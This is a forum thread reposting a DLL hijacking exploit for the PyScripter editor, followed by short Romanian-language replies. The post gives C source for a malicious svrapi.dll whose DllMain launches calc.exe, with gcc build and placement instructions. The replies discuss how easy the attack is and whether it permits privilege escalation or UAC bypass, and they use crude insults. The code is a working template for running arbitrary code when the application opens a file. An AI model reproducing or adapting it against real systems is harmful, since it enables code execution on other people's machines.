PyScripter DLL Hijacking

Aerosol · April 7, 2015

/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: PyScriper DLL Hijacking
#[+] Date: 05-04-2015
#[+] Type: Local Exploits
#[+] Vendor: https://code.google.com/p/pyscripter/
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] gcc -shared -o svrapi.dll  dllhijack.c
then put svrapi.dll and create a .py file in the same dir, open the .py file , calc.exe execute.
Proof of Concept (PoC):
=======================
*/

#include <windows.h>

int tunisian()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
tunisian();
return 0;
}

Source

u0m3 · April 7, 2015

Nu are voie sa fie asa de usor...

neox · April 8, 2015

Nu are voie sa fie asa de usor...

Din pacate este foarte usor DLL Hijacking si foarte multe programe au problema asta, mai ales cand instalezi programe crackuite si iti ofera in crackul programului respectiv exe si .dll date este pericolul mare.

In .dll poti ascunde ce vrei tu.

Nytro · April 8, 2015

Ideea era sa faci privilege escalation/bypass UAC. Unde e folder-ul aplicatiei asteia, Program Files sau AppData? Daca e in Program Files, cacat, nu ai drept de scriere acolo ca "normal user".

Apoi, aplicatia ruleaza ca Admin? Chiar daca trebuie pornita manual (adica nu la startup) si chiar daca apare promt-ul UAC, acesta o sa fie legitim, dar daca nu, exploit-urile lui "tunis-pula" sunt niste cacaturi inutile.

Sign In

PyScripter DLL Hijacking

Recommended Posts

Aerosol

u0m3

neox

Nytro

Join the conversation

Browse

Activity

Pages